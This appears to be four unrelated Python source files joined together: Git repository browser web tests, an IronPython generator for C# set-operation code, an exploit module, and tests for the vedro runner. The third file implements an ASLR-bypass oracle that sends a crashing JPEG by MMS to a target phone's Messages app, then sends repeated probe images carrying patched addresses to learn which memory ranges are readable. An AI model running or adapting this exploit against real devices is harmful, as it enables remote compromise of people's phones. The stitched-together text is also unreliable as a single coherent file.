u'oid': u'df30427c488aeab84b2352bdf88a3b19223f9d7a',
u'column': 0,
u'parents': [u'6a45885ae7347f1cac5103b0050cc1be6a1496c8'],
u'message': u'Add README', u'row': 1})
def test_log(self):
resp = self.app.get('/src-git/ref/master~/log/')
def test_tags(self):
resp = self.app.get('/src-git/ref/master~/tags/')
def _get_ci(self):
r = self.app.get('/src-git/ref/master:/')
resp = r.follow()
for tag in resp.html.findAll('a'):
if tag['href'].startswith('/p/test/src-git/ci/'):
return tag['href']
return None
def test_commit(self):
ci = self._get_ci()
resp = self.app.get(ci)
assert 'Rick' in resp, resp.showbrowser()
def test_feed(self):
assert 'Add README' in self.app.get('/feed')
def test_tree(self):
ci = self._get_ci()
resp = self.app.get(ci + 'tree/')
assert len(resp.html.findAll('tr')) == 2, resp.showbrowser()
resp = self.app.get(ci + 'tree/')
assert 'README' in resp, resp.showbrowser()
links = [ a.get('href') for a in resp.html.findAll('a') ]
assert 'README' in links, resp.showbrowser()
assert 'README/' not in links, resp.showbrowser()
def test_tree_extra_params(self):
ci = self._get_ci()
resp = self.app.get(ci + 'tree/?format=raw')
assert 'README' in resp, resp.showbrowser()
def test_file(self):
ci = self._get_ci()
resp = self.app.get(ci + 'tree/README')
assert 'README' in resp.html.find('h2', {'class':'dark title'}).contents[2]
content = str(resp.html.find('div', {'class':'clip grid-19'}))
assert 'This is readme' in content, content
assert '<span id="l1" class="code_block">' in resp
assert 'var hash = window.location.hash.substring(1);' in resp
def test_invalid_file(self):
ci = self._get_ci()
self.app.get(ci + 'tree/READMEz', status=404)
def test_diff(self):
ci = self._get_ci()
resp = self.app.get(ci + 'tree/README?diff=df30427c488aeab84b2352bdf88a3b19223f9d7a')
assert 'readme' in resp, resp.showbrowser()
assert '+++' in resp, resp.showbrowser()
def test_refresh(self):
notification = M.Notification.query.find(
dict(subject='[test:src-git] 4 new commits to test Git')).first()
domain = '.'.join(reversed(c.app.url[1:-1].split('/'))).replace('_', '-')
common_suffix = tg.config.get('forgemail.domain', '.sourceforge.net')
email = 'noreply@%s%s' % (domain, common_suffix)
assert email in notification['reply_to_address']
def test_file_force_display(self):
ci = self._get_ci()
resp = self.app.get(ci + 'tree/README?force=True')
content = str(resp.html.find('div', {'class':'clip grid-19'}))
assert re.search(r'<pre>.*This is readme', content), content
assert '</pre>' in content, content
def test_index_files(self):
"""Test that `index.*` files are viewable in code browser"""
self.setup_testgit_index_repo()
ci = '/p/test/testgit-index/ci/eaec8e7fc91f18d6bf294379d16146ef9226a1ab/'
# `index.html` in repo root
r = self.app.get(ci + 'tree/index.html')
header = r.html.find('h2', {'class': 'dark title'}).contents[2]
assert 'index.html' in header, header
content = str(r.html.find('div', {'class': 'clip grid-19'}))
assert ('<span class="nt"><h1></span>'
'index.html'
'<span class="nt"></h1></span>') in content, content
# `index` dir in repo root
r = self.app.get(ci + 'tree/index/')
assert 'inside_index_dir.txt' in r
# `index.htm` in `index` dir
r = self.app.get(ci + 'tree/index/index.htm')
header = r.html.find('h2', {'class': 'dark title'})
assert 'index' in header.contents[3], header.contents[3]
assert 'index.htm' in header.contents[4], header.contents[4]
content = str(r.html.find('div', {'class': 'clip grid-19'}))
assert ('<span class="nt"><h1></span>'
'index/index.htm'
'<span class="nt"></h1></span>') in content, content
def test_subscribe(self):
user = M.User.query.get(username='test-user')
ci = self._get_ci()
# user is not subscribed
assert not M.Mailbox.subscribed(user_id=user._id)
r = self.app.get(ci + 'tree/',
extra_environ={'username': str(user.username)})
header = r.html.find('h2', {'class': 'dark title'})
link = header.find('a', {'class': 'artifact_subscribe'})
assert link is not None, header
# subscribe
self.app.get(ci + 'tree/subscribe?subscribe=True',
extra_environ={'username': str(user.username)}).follow()
# user is subscribed
assert M.Mailbox.subscribed(user_id=user._id)
r = self.app.get(ci + 'tree/',
extra_environ={'username': str(user.username)})
header = r.html.find('h2', {'class': 'dark title'})
link = header.find('a', {'class': 'artifact_unsubscribe active'})
assert link is not None, header
# unsubscribe
self.app.get(ci + 'tree/subscribe?unsubscribe=True',
extra_environ={'username': str(user.username)}).follow()
# user is not subscribed
assert not M.Mailbox.subscribed(user_id=user._id)
r = self.app.get(ci + 'tree/',
extra_environ={'username': str(user.username)})
header = r.html.find('h2', {'class': 'dark title'})
link = header.find('a', {'class': 'artifact_subscribe'})
assert link is not None, header
class TestRestController(_TestCase):
def test_index(self):
self.app.get('/rest/p/test/src-git/', status=200)
def test_commits(self):
self.app.get('/rest/p/test/src-git/commits', status=200)
class TestFork(_TestCase):
def setUp(self):
super(TestFork, self).setUp()
to_project = M.Project.query.get(
shortname='test2', neighborhood_id=c.project.neighborhood_id)
r = self.app.post('/src-git/fork', params=dict(
project_id=str(to_project._id),
mount_point='code',
mount_label='Test forked repository'))
assert "{status: 'error'}" not in str(r.follow())
cloned_from = c.app.repo
with h.push_context('test2', 'code', neighborhood='Projects'):
c.app.repo.init_as_clone(
cloned_from.full_fs_path,
cloned_from.app.config.script_name(),
cloned_from.full_fs_path)
def _follow(self, r, **kw):
if r.status_int == 302:
print r.request.url
while r.status_int == 302:
print ' ==> 302 ==> %s' % r.location
r = r.follow(**kw)
return r
def _upstream_page(self, **kw):
r = self.app.get('/src-git/', **kw)
r = self._follow(r, **kw)
return r
def _fork_page(self, **kw):
r = self.app.get('/p/test2/code/', **kw)
r = self._follow(r, **kw)
return r
def _request_merge(self, **kw):
r = self.app.get('/p/test2/code/request_merge', **kw)
r = self._follow(r, **kw)
r = r.forms[0].submit()
r = self._follow(r, **kw)
mr_num = r.request.url.split('/')[-2]
assert mr_num.isdigit(), mr_num
return r, mr_num
def test_fork_form(self):
r = self.app.get('%sfork/' % c.app.repo.url())
assert '<input type="text" name="mount_point" value="test"/>' in r
assert '<input type="text" name="mount_label" value="test - Git"/>' in r
def test_fork_listed_in_parent(self):
assert 'Forks' in self._upstream_page()
def test_fork_display(self):
r = self._fork_page()
assert 'Clone of' in r
assert 'Test forked repository' in r
def test_fork_links_go_to_fork(self):
r = self._fork_page()
hrefs = ( a.get('href') for a in r.html('a') )
hrefs = ( href for href in hrefs if href and '/ci/' in href )
for href in hrefs:
assert href.startswith('/p/test2/code/'), href
def test_merge_request_visible_to_admin(self):
assert 'Request Merge' in self._fork_page()
def test_merge_request_invisible_to_non_admin(self):
assert 'Request Merge' not in self._fork_page(
extra_environ=dict(username='test-user'))
def test_merge_action_available_to_admin(self):
self.app.get('/p/test2/code/request_merge')
def test_merge_action_unavailable_to_non_admin(self):
self.app.get(
'/p/test2/code/request_merge',
status=403, extra_environ=dict(username='test-user'))
def test_merge_request_detail_view(self):
r, mr_num = self._request_merge()
assert 'would like you to merge' in r, r.showbrowser()
def test_merge_request_list_view(self):
r, mr_num = self._request_merge()
r = self.app.get('/p/test/src-git/merge-requests/')
assert 'href="%s/"' % mr_num in r, r
def test_merge_request_update_status(self):
r, mr_num = self._request_merge()
r = self.app.post('/p/test/src-git/merge-requests/%s/save' % mr_num,
params=dict(status='rejected')).follow()
assert 'Merge Request #%s: (rejected)' % mr_num in r, r
|
|
# Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the Apache 2.0 License.
# See the LICENSE file in the project root for more information.
from generate import generate
def add_not_null(arg_t):
return arg_t if arg_t.endswith("?") else "[NotNull] " + arg_t
def get_type(mutable):
if mutable:
return 'SetCollection'
else:
return 'FrozenSetCollection'
def get_arg_ts(mutable):
return [get_type(mutable), get_type(not mutable), 'object?']
def get_clrname(name):
return ''.join(map(str.capitalize, name.split('_')))
def get_items(arg_t):
if arg_t == 'object?':
return 'SetStorage.GetItems(set)'
else:
return 'set._items'
def copy(cw, mutable):
if mutable:
cw.writeline('return copy();')
else:
cw.writeline('return Make(_items);')
def copy_op(cw, mutable, name):
t = get_type(mutable)
cw.enter_block('public %s %s()' % (t, name))
copy(cw, mutable)
cw.exit_block()
cw.writeline()
def simple_op(cw, t, arg_t, name):
clrname = get_clrname(name)
cw.enter_block('public %s %s(%s set)' % (t, name, add_not_null(arg_t)))
simple_op_worker(cw, t, arg_t, name)
cw.exit_block()
cw.writeline()
def simple_op_worker(cw, t, arg_t, name):
clrname = get_clrname(name)
if arg_t == 'object?':
cw.writeline('SetStorage items;')
cw.enter_block('if (SetStorage.GetItems(set, out items))')
cw.writeline('items = SetStorage.%s(_items, items);' % clrname)
cw.else_block()
cw.writeline('items.%sUpdate(_items);' % clrname)
cw.exit_block()
cw.writeline('return Make(items);')
else:
cw.writeline(
'return Make(SetStorage.%s(_items, set._items));' % clrname
)
def enter_multiarg_op(cw, t, name):
cw.enter_block('public %s %s([NotNull] params object[]/*!*/ sets)' % (t, name))
def union_multiarg(cw, mutable):
t = get_type(mutable)
enter_multiarg_op(cw, t, 'union')
cw.writeline('SetStorage res = _items.Clone();')
cw.enter_block('foreach (object set in sets)')
cw.writeline('res.UnionUpdate(SetStorage.GetItems(set));')
cw.exit_block()
cw.writeline()
cw.writeline('return Make(res);')
cw.exit_block()
cw.writeline()
def intersection_multiarg(cw, mutable):
t = get_type(mutable)
enter_multiarg_op(cw, t, 'intersection')
cw.enter_block('if (sets.Length == 0)')
copy(cw, mutable)
cw.exit_block()
cw.writeline()
cw.writeline('SetStorage res = _items;')
cw.enter_block('foreach (object set in sets)')
cw.writeline('SetStorage items, x = res, y;')
cw.enter_block('if (SetStorage.GetItems(set, out items))')
cw.writeline('y = items;')
cw.writeline('SetStorage.SortBySize(ref x, ref y);')
cw.writeline()
cw.enter_block('if (%s(x, items) || %s(x, _items))' %
(('object.ReferenceEquals',) * 2))
cw.writeline('x = x.Clone();')
cw.exit_block()
cw.else_block()
cw.writeline('y = items;')
cw.writeline('SetStorage.SortBySize(ref x, ref y);')
cw.writeline()
cw.enter_block('if (object.ReferenceEquals(x, _items))')
cw.writeline('x = x.Clone();')
cw.exit_block()
cw.exit_block()
cw.writeline('x.IntersectionUpdate(y);')
cw.writeline('res = x;')
cw.exit_block()
cw.writeline()
cw.writeline('Debug.Assert(!object.ReferenceEquals(res, _items));')
cw.writeline('return Make(res);')
cw.exit_block()
cw.writeline()
def difference(cw, t, arg_t):
items = get_items(arg_t)
cw.enter_block('public %s difference(%s set)' % (t, add_not_null(arg_t)))
if (t == arg_t):
cw.enter_block('if (object.ReferenceEquals(set, this))')
cw.writeline('return Empty;')
cw.exit_block()
cw.writeline()
cw.writeline('return Make(')
cw.indent()
cw.writeline('SetStorage.Difference(_items, %s)' % items)
cw.dedent()
cw.writeline(');');
cw.exit_block()
cw.writeline()
def difference_multiarg(cw, mutable):
t = get_type(mutable)
enter_multiarg_op(cw, t, 'difference')
cw.enter_block('if (sets.Length == 0)')
copy(cw, mutable)
cw.exit_block()
cw.writeline()
cw.writeline('SetStorage res = _items;')
cw.enter_block('foreach (object set in sets)')
cw.enter_block('if (object.ReferenceEquals(set, this))')
cw.writeline('return Empty;')
cw.exit_block()
cw.writeline()
cw.writeline('SetStorage items = SetStorage.GetItems(set);')
cw.enter_block('if (object.ReferenceEquals(res, _items))')
cw.writeline('res = SetStorage.Difference(_items, items);')
cw.else_block()
cw.writeline('res.DifferenceUpdate(items);')
cw.exit_block()
cw.exit_block()
cw.writeline()
cw.writeline('Debug.Assert(!object.ReferenceEquals(res, _items));')
cw.writeline('return Make(res);')
cw.exit_block()
cw.writeline()
def symmetric_difference(cw, t, arg_t):
cw.enter_block('public %s symmetric_difference(%s set)' % (t, add_not_null(arg_t)))
if (t == arg_t):
cw.enter_block('if (object.ReferenceEquals(set, this))')
cw.writeline('return Empty;')
cw.exit_block()
cw.writeline()
simple_op_worker(cw, t, arg_t, 'symmetric_difference')
cw.exit_block()
cw.writeline()
def gen_setops(mutable):
def _gen_setops(cw):
t = get_type(mutable)
arg_ts = get_arg_ts(mutable)
for arg_t in arg_ts:
items = get_items(arg_t)
cw.enter_block('public bool isdisjoint(%s set)' % add_not_null(arg_t))
cw.writeline('return _items.IsDisjoint(%s);' % items)
cw.exit_block()
cw.writeline()
for arg_t in arg_ts:
items = get_items(arg_t)
cw.enter_block('public bool issubset(%s set)' % add_not_null(arg_t))
cw.writeline('return _items.IsSubset(%s);' % items)
cw.exit_block()
cw.writeline()
for arg_t in arg_ts:
items = get_items(arg_t)
cw.enter_block('public bool issuperset(%s set)' % add_not_null(arg_t))
cw.writeline('return %s.IsSubset(_items);' % items)
cw.exit_block()
cw.writeline()
copy_op(cw, mutable, 'union')
for arg_t in arg_ts:
simple_op(cw, t, arg_t, 'union')
union_multiarg(cw, mutable)
copy_op(cw, mutable, 'intersection')
for arg_t in arg_ts:
simple_op(cw, t, arg_t, 'intersection')
intersection_multiarg(cw, mutable)
copy_op(cw, mutable, 'difference')
for arg_t in arg_ts:
difference(cw, t, arg_t)
difference_multiarg(cw, mutable)
for arg_t in arg_ts:
symmetric_difference(cw, t, arg_t)
return _gen_setops
op_symbols = [ '|', '&', '^', '-' ]
op_names = [ 'union', 'intersection', 'symmetric_difference', 'difference' ]
op_upnames = [ 'update' ] + [x + '_update' for x in op_names[1:]]
op_clrnames = [ 'BitwiseOr', 'BitwiseAnd', 'ExclusiveOr', 'Subtract' ]
def gen_op(cw, t_left, t_right, symbol, name):
cw.enter_block(
'public static %s operator %s(%s x, %s y)' %
(t_left, symbol, add_not_null(t_left), add_not_null(t_right))
)
cw.writeline('return x.%s(y);' % name)
cw.exit_block()
cw.writeline()
def gen_ops(mutable):
def _gen_ops(cw):
t = get_type(mutable)
u = get_type(not mutable)
ops = list(zip(op_symbols, op_names))
for symbol, name in ops:
gen_op(cw, t, t, symbol, name)
for symbol, name in ops:
gen_op(cw, t, u, symbol, name)
return _gen_ops
def gen_mutating_op(cw, t, arg_t, symbol, upname, clrname):
cw.writeline('[SpecialName]')
cw.enter_block('public %s InPlace%s(%s set)' % (t, clrname, add_not_null(arg_t)))
if arg_t == 'object?':
cw.enter_block(
'if (set is %s || set is %s)' %
tuple(map(get_type, [False, True]))
)
cw.writeline('%s(set);' % upname)
cw.writeline('return this;')
if arg_t == 'object?':
cw.exit_block()
cw.writeline()
cw.writeline('throw PythonOps.TypeError(')
cw.indent()
cw.writeline(
'''"unsupported operand type(s) for %s=: '{0}' and '{1}'",''' %
symbol
)
cw.writeline('%s(this), %s(set)' % (('PythonOps.GetPythonTypeName',) * 2))
cw.dedent()
cw.writeline(');')
cw.exit_block()
cw.writeline()
def gen_mutating_ops(cw):
t = get_type(True)
arg_ts = get_arg_ts(True)
for op in zip(op_symbols, op_upnames, op_clrnames):
for arg_t in arg_ts:
gen_mutating_op(cw, t, arg_t, *op)
compares = [ '>', '<', '>=', '<=' ]
def is_subset(compare):
return compare == '<' or compare == '<='
def is_strict(compare):
return not compare.endswith('=')
def gen_comparison(cw, t, compare):
cw.writeline('[return: MaybeNotImplemented]')
cw.enter_block(
'public static object operator %s([NotNull] %s self, object? other)' %
(compare, t)
)
cw.enter_block('if (SetStorage.GetItemsIfSet(other, out SetStorage items))')
if is_subset(compare):
left = 'self._items'
right = 'items'
else:
left = 'items'
right = 'self._items'
if is_strict(compare):
func = 'IsStrictSubset'
else:
func = 'IsSubset'
cw.writeline('return %s.%s(%s);' % (left, func, right))
cw.exit_block()
cw.writeline()
cw.writeline('return NotImplementedType.Value;')
cw.exit_block()
cw.writeline()
def suppress(cw, *msgs):
if len(msgs) == 0:
return
comma = ''
res = '['
for msg in msgs:
res += comma + 'System.Diagnostics.CodeAnalysis.SuppressMessage('
res += msg + ')'
comma = ' ,'
res += ']'
cw.writeline(res)
def gen_comparisons(cw, t):
cw.writeline('#region IRichComparable')
cw.writeline()
for compare in compares:
gen_comparison(cw, t, compare)
cw.writeline('#endregion')
cw.writeline()
def gen_ienumerable(cw, mutable):
cw.writeline('#region IEnumerable Members')
cw.writeline()
cw.enter_block('IEnumerator IEnumerable.GetEnumerator()')
cw.writeline('return new SetIterator(_items, %s);' % str(mutable).lower())
cw.exit_block()
cw.writeline()
cw.writeline('#endregion')
cw.writeline()
cw.writeline('#region IEnumerable<object?> Members')
cw.writeline()
cw.enter_block('IEnumerator<object?> IEnumerable<object?>.GetEnumerator()')
cw.writeline('return new SetIterator(_items, %s);' % str(mutable).lower())
cw.exit_block()
cw.writeline()
cw.writeline('#endregion')
cw.writeline()
def gen_icodeformattable(cw):
cw.writeline('#region ICodeFormattable Members')
cw.writeline()
cw.enter_block('public virtual string/*!*/ __repr__(CodeContext/*!*/ context)')
cw.writeline('return SetStorage.SetToString(context, this, _items);')
cw.exit_block()
cw.writeline()
cw.writeline('#endregion')
cw.writeline()
def gen_icollection(cw):
cw.writeline('#region ICollection Members')
cw.writeline()
cw.enter_block('void ICollection.CopyTo(Array array, int index)')
cw.writeline('int i = 0;')
cw.enter_block('foreach (var o in this)')
cw.writeline('array.SetValue(o, index + i++);')
cw.exit_block()
cw.exit_block()
cw.writeline()
cw.enter_block('public int Count')
cw.writeline('[PythonHidden]')
cw.writeline('get { return _items.Count; }')
cw.exit_block()
cw.writeline()
cw.enter_block('bool ICollection.IsSynchronized')
cw.writeline('get { return false; }')
cw.exit_block()
cw.writeline()
cw.enter_block('object ICollection.SyncRoot')
cw.writeline('get { return this; }')
cw.exit_block()
cw.writeline()
cw.writeline('#endregion')
cw.writeline()
def gen_iweakreferenceable(cw):
cw.writeline('#region IWeakReferenceable Members')
cw.writeline()
cw.writeline('private WeakRefTracker? _tracker;')
cw.writeline()
cw.enter_block('WeakRefTracker? IWeakReferenceable.GetWeakRef()')
cw.writeline('return _tracker;')
cw.exit_block()
cw.writeline()
cw.enter_block('bool IWeakReferenceable.SetWeakRef(WeakRefTracker value)')
cw.writeline('return Interlocked.CompareExchange(ref _tracker, value, null) == null;')
cw.exit_block()
cw.writeline()
cw.enter_block('void IWeakReferenceable.SetFinalizer(WeakRefTracker value)')
cw.writeline('_tracker = value;')
cw.exit_block()
cw.writeline()
cw.writeline('#endregion')
cw.writeline()
def gen_interfaces(mutable):
def _gen_interfaces(cw):
t = get_type(mutable)
gen_comparisons(cw, t)
gen_ienumerable(cw, mutable)
gen_icodeformattable(cw)
gen_icollection(cw)
gen_iweakreferenceable(cw)
return _gen_interfaces
def main():
generators = [
('NonOperator Operations', gen_setops),
('Operators', gen_ops),
('Interface Implementations', gen_interfaces),
]
mutable_generators = [
('Mutating Operators', gen_mutating_ops),
]
_generators = []
for title, func in generators:
for bit in [True, False]:
_generators.append((
title + ' (' + get_type(bit) + ')',
func(bit)
))
_generators.extend(mutable_generators)
return generate(*_generators)
if __name__ == '__main__':
main()
|
|
from intervaltree import Interval, IntervalTree
import json
import logging
import mms
import os
import struct
import sys
import time
def PageAligned(x):
return ((x & 0xfff) == 0)
class AslrOracle:
def __init__(self):
self.queries = 0
self.InitCache()
def CheckAddress(self, address):
return self.CheckRange(address, 0x1000)
def InitCache(self):
self.cached_queries = 0
self.good_regions = IntervalTree()
self.bad_regions = IntervalTree()
def InsertToCache(self, start, end, valid):
if valid:
self.good_regions.add(Interval(start, end + 1))
self.good_regions.merge_overlaps()
else:
self.bad_regions.add(Interval(start, end))
def CheckCache(self, start, end):
good_overlaps = self.good_regions.overlap(start, end)
for overlap in good_overlaps:
if (overlap[0] <= start) and (overlap[1] >= end):
self.cached_queries += 1
return True
bad_overlaps = self.bad_regions.envelop(start, end)
if len(bad_overlaps) > 0:
self.cached_queries += 1
return False
return None
class TestAslrOracle(AslrOracle):
def __init__(self, maps_file):
AslrOracle.__init__(self)
self.AslrBaseAddr = 0x6f00000000
self.AslrEndAddr = 0x8000000000
self.valid_pages = set()
with open(maps_file, "r") as f:
lines = f.readlines()
for line in lines:
line = line.split()
addrs = line[0].split('-')
start_addr = int(addrs[0], 16)
end_addr = int(addrs[1], 16)
perms = line[1][:3]
if start_addr < self.AslrBaseAddr or end_addr >= self.AslrEndAddr:
continue
if perms[0] == 'r':
for addr in range(start_addr, end_addr, 0x1000):
self.valid_pages.add(addr)
logging.info("Found %d readable pages" % len(self.valid_pages))
def CheckRange(self, address, length):
assert(PageAligned(address))
length = (length + 0xfff) & (~0xfff)
self.queries += 1
cached = self.CheckCache(address, address + length)
if cached != None:
return cached
result = True
for tested_addr in range(address, address + length, 0x1000):
if tested_addr not in self.valid_pages:
result = False
break
self.InsertToCache(address, address + length, result)
return result
class MmsAslrOracle(AslrOracle):
def __init__(self, config_file):
AslrOracle.__init__(self)
# Load configuration from disk.
self.LoadConfig(config_file)
# Initialize the MMS client object.
self.mms = mms.MmsClient(self.hostname, self.username, self.password,
self.mms_in_dir)
# Send an empty test MMS to check that everything works correctly on the
# MMSC side, and that the target phone is online.
logging.info("Sending test MMS to check if the device is online...")
received = self.mms.Send(self.phone_number,
[("test.txt", "", "text/plain")],
receipt_wait_time = self.receipt_wait_time)
if received:
logging.info("Received ack, phone is up and the setup works.")
else:
logging.error("Message was not sent or received by the target, please "
"make sure that your MMSC server is working correctly and "
"the target phone is logged in the network.")
sys.exit(1)
logging.info("Crashing the Messages app remotely now to get a clean state "
"for further exploitation.")
self.CrashMessages()
def LoadConfig(self, config_file):
with open(config_file, "r") as f:
config = json.loads(f.read())
self.phone_number = config["phone_number"]
self.hostname = config["hostname"]
self.username = config["username"]
self.password = config["password"]
self.mms_in_dir = config["mms_in_dir"]
assert(os.path.exists(self.mms_in_dir))
with open(config["crashing_sample"], "rb") as f:
self.crashing_sample = f.read()
with open(config["probe_sample"], "rb") as f:
self.probe_sample = f.read()
self.probe_address_offset = int(config["probe_address_offset"], 16)
self.probe_size_offset = int(config["probe_size_offset"], 16)
self.cooldown_time = float(config["cooldown_time"])
self.receipt_wait_time = float(config["receipt_wait_time"])
def CooldownAfterCrash(self):
cur_time = time.time()
if cur_time - self.last_crash_time < self.cooldown_time:
delay = self.cooldown_time - (cur_time - self.last_crash_time)
logging.debug("Cooldown, sleeping for %d seconds..." % delay)
time.sleep(delay)
logging.debug("Woke up, back to the action!")
def CrashMessages(self):
self.mms.Send(self.phone_number,
[("crash.jpg", self.crashing_sample, "image/jpeg")])
self.last_crash_time = time.time()
def SendProbeMMS(self, files, subject=None, text=None):
return self.mms.Send(self.phone_number, files, subject, text,
receipt_wait_time = self.receipt_wait_time)
def CheckRange(self, address, length):
assert(PageAligned(address))
length = (length + 0xfff) & (~0xfff)
region_end = address + length - 1
self.queries += 1
############################################################################
# Check the cache first
############################################################################
cached = self.CheckCache(address, address + length)
if cached != None:
return cached
############################################################################
# Construct the probe test case
############################################################################
probe_sample = self.probe_sample
# Insert the tested address into the probe sample
probe_sample = (
probe_sample[:self.probe_address_offset] +
struct.pack("<Q", address) +
probe_sample[self.probe_address_offset + 8:]
)
# Insert the tested length into the probe sample
probe_sample = (
probe_sample[:self.probe_size_offset] +
struct.pack("<I", length // 0x1000) +
probe_sample[self.probe_size_offset + 4:]
)
############################################################################
# Send probes until we get enough confidence that the result is a valid one
############################################################################
oracle_score = [0, 0]
probe_no = 0
while ((oracle_score[False] - oracle_score[True] < 1) and
(oracle_score[True] - oracle_score[False] < 1)):
logging.debug("Range [%x .. %x], iteration %d, current oracle score: %s" %
(address, region_end, probe_no, oracle_score))
self.CooldownAfterCrash()
logging.debug("Sending probe %d..." % (probe_no + 1))
probe_outcome = self.SendProbeMMS(
[("probe.jpg", probe_sample, "image/jpeg")],
subject="Testing address %x" % address
)
oracle_score[probe_outcome] += 1
if probe_outcome:
logging.debug("Probe %d returned TRUE, crashing Messages" %
(probe_no + 1))
self.CrashMessages()
else:
logging.debug("Probe %d returned FALSE" % (probe_no + 1))
self.last_crash_time = time.time() - self.receipt_wait_time
probe_no += 1
winner = (oracle_score[True] > oracle_score[False])
logging.debug("Range [%x .. %x], iterations %d, final score %s" %
(address, region_end, probe_no, oracle_score))
logging.info("Range [%x .. %x] is readable: %s" %
(address, region_end, winner))
self.InsertToCache(address, address + length, winner)
return winner
|
|
import sys
from pytest import raises
if sys.version_info >= (3, 8):
from unittest.mock import AsyncMock
else:
from asynctest.mock import CoroutineMock as AsyncMock
from unittest.mock import Mock, call
import pytest
from baby_steps import given, then, when
from vedro import Scenario
from vedro.core import Dispatcher, Runner, VirtualScenario, VirtualStep
from vedro.events import (
ExceptionRaisedEvent,
ScenarioFailedEvent,
ScenarioPassedEvent,
ScenarioRunEvent,
StepFailedEvent,
StepPassedEvent,
StepRunEvent,
)
@pytest.fixture()
def dispatcher_():
return AsyncMock(Dispatcher())
@pytest.fixture()
def runner(dispatcher_: Dispatcher):
return Runner(dispatcher_)
@pytest.mark.asyncio
@pytest.mark.parametrize("method_mock_factory", (Mock, AsyncMock,))
async def test_runner_run_step_passed(method_mock_factory: Mock, *,
runner: Runner, dispatcher_: Dispatcher):
with given:
scenario_ = Mock(Scenario, step=method_mock_factory(return_value=None))
step = VirtualStep(scenario_.step)
with when:
step_result = await runner.run_step(step, scenario_)
with then:
assert scenario_.mock_calls == [call.step(scenario_)]
assert step_result.is_passed() is True
assert step_result.exc_info is None
assert isinstance(step_result.started_at, float)
assert isinstance(step_result.ended_at, float)
assert dispatcher_.mock_calls == [
call.fire(StepRunEvent(step_result)),
call.fire(StepPassedEvent(step_result)),
]
@pytest.mark.asyncio
@pytest.mark.parametrize("method_mock_factory", (Mock, AsyncMock))
async def test_runner_run_step_failed(method_mock_factory: Mock, *,
runner: Runner, dispatcher_: Dispatcher):
with given:
exception = AssertionError()
scenario_ = Mock(Scenario, step=method_mock_factory(side_effect=exception))
step = VirtualStep(scenario_.step)
with when:
step_result = await runner.run_step(step, scenario_)
with given:
assert scenario_.mock_calls == [call.step(scenario_)]
assert step_result.is_failed() is True
assert step_result.exc_info.value == exception
assert isinstance(step_result.started_at, float)
assert isinstance(step_result.ended_at, float)
assert dispatcher_.mock_calls == [
call.fire(StepRunEvent(step_result)),
call.fire(ExceptionRaisedEvent(step_result.exc_info)),
call.fire(StepFailedEvent(step_result)),
]
@pytest.mark.asyncio
@pytest.mark.parametrize("method_mock_factory", (Mock, AsyncMock))
async def test_runner_run_step_interrupted(*, method_mock_factory: Mock, dispatcher_: Dispatcher):
with given:
interrupt_exception = KeyboardInterrupt
scenario_ = Mock(Scenario, step=method_mock_factory(side_effect=interrupt_exception))
virtual_step = VirtualStep(scenario_.step)
runner = Runner(dispatcher_, interrupt_exceptions=(interrupt_exception,))
with when, raises(BaseException) as exception:
await runner.run_step(virtual_step, scenario_)
with given:
assert exception.type is interrupt_exception
assert scenario_.mock_calls == [call.step(scenario_)]
@pytest.mark.asyncio
async def test_runner_run_scenario_no_steps_passed(*, runner: Runner, dispatcher_: Dispatcher):
with given:
scenario_ = Mock(Scenario, step=Mock(return_value=None), __file__="/tmp/scenario.py")
virtual_scenario = VirtualScenario(scenario_, [])
with when:
scenario_result = await runner.run_scenario(virtual_scenario)
with then:
assert scenario_result.is_passed() is True
assert isinstance(scenario_result.started_at, float)
assert isinstance(scenario_result.ended_at, float)
assert dispatcher_.mock_calls == [
call.fire(ScenarioRunEvent(scenario_result)),
call.fire(ScenarioPassedEvent(scenario_result)),
]
@pytest.mark.asyncio
async def test_runner_run_scenario_single_step_passed(*, runner: Runner, dispatcher_: Dispatcher):
with given:
scenario_ = Mock(Scenario, step=Mock(return_value=None), __file__="/tmp/scenario.py")
step = VirtualStep(scenario_.step)
virtual_scenario = VirtualScenario(scenario_, [step])
with when:
scenario_result = await runner.run_scenario(virtual_scenario)
with then:
assert scenario_result.is_passed() is True
assert isinstance(scenario_result.started_at, float)
assert isinstance(scenario_result.ended_at, float)
step_results = scenario_result.step_results
assert dispatcher_.mock_calls == [
call.fire(ScenarioRunEvent(scenario_result)),
call.fire(StepRunEvent(step_results[0])),
call.fire(StepPassedEvent(step_results[0])),
call.fire(ScenarioPassedEvent(scenario_result)),
]
@pytest.mark.asyncio
async def test_runner_run_scenario_single_step_failed(*, runner: Runner, dispatcher_: Dispatcher):
with given:
exception = AssertionError()
scenario_ = Mock(Scenario, step=Mock(side_effect=exception), __file__="/tmp/scenario.py")
step = VirtualStep(scenario_.step)
virtual_scenario = VirtualScenario(scenario_, [step])
with when:
scenario_result = await runner.run_scenario(virtual_scenario)
with then:
assert scenario_result.is_failed() is True
assert isinstance(scenario_result.started_at, float)
assert isinstance(scenario_result.ended_at, float)
step_results = scenario_result.step_results
assert dispatcher_.mock_calls == [
call.fire(ScenarioRunEvent(scenario_result)),
call.fire(StepRunEvent(step_results[0])),
call.fire(ExceptionRaisedEvent(step_results[0].exc_info)),
call.fire(StepFailedEvent(step_results[0])),
call.fire(ScenarioFailedEvent(scenario_result)),
]
@pytest.mark.asyncio
async def test_runner_run_scenario_multiple_steps_passed(*, runner: Runner,
dispatcher_: Dispatcher):
with given:
scenario_ = Mock(Scenario, __file__="/tmp/scenario.py",
first_step=Mock(return_value=None),
second_step=Mock(return_value=None))
first_step = VirtualStep(scenario_.first_step)
second_step = VirtualStep(scenario_.second_step)
virtual_scenario = VirtualScenario(scenario_, [first_step, second_step])
with when:
scenario_result = await runner.run_scenario(virtual_scenario)
with then:
assert scenario_result.is_passed() is True
assert isinstance(scenario_result.started_at, float)
assert isinstance(scenario_result.ended_at, float)
first_step_result = scenario_result.step_results[0]
second_step_result = scenario_result.step_results[1]
assert dispatcher_.mock_calls == [
call.fire(ScenarioRunEvent(scenario_result)),
call.fire(StepRunEvent(first_step_result)),
call.fire(StepPassedEvent(first_step_result)),
call.fire(StepRunEvent(second_step_result)),
call.fire(StepPassedEvent(second_step_result)),
call.fire(ScenarioPassedEvent(scenario_result)),
]
@pytest.mark.asyncio
async def test_runner_run_scenario_multiple_steps_failed():
with given:
dispatcher = AsyncMock(Dispatcher)
runner = Runner(dispatcher)
exception = AssertionError()
scenario_ = Mock(Scenario, __file__="/tmp/scenario.py",
first_step=Mock(return_value=None),
second_step=Mock(side_effect=exception),
third_step=Mock(return_value=None))
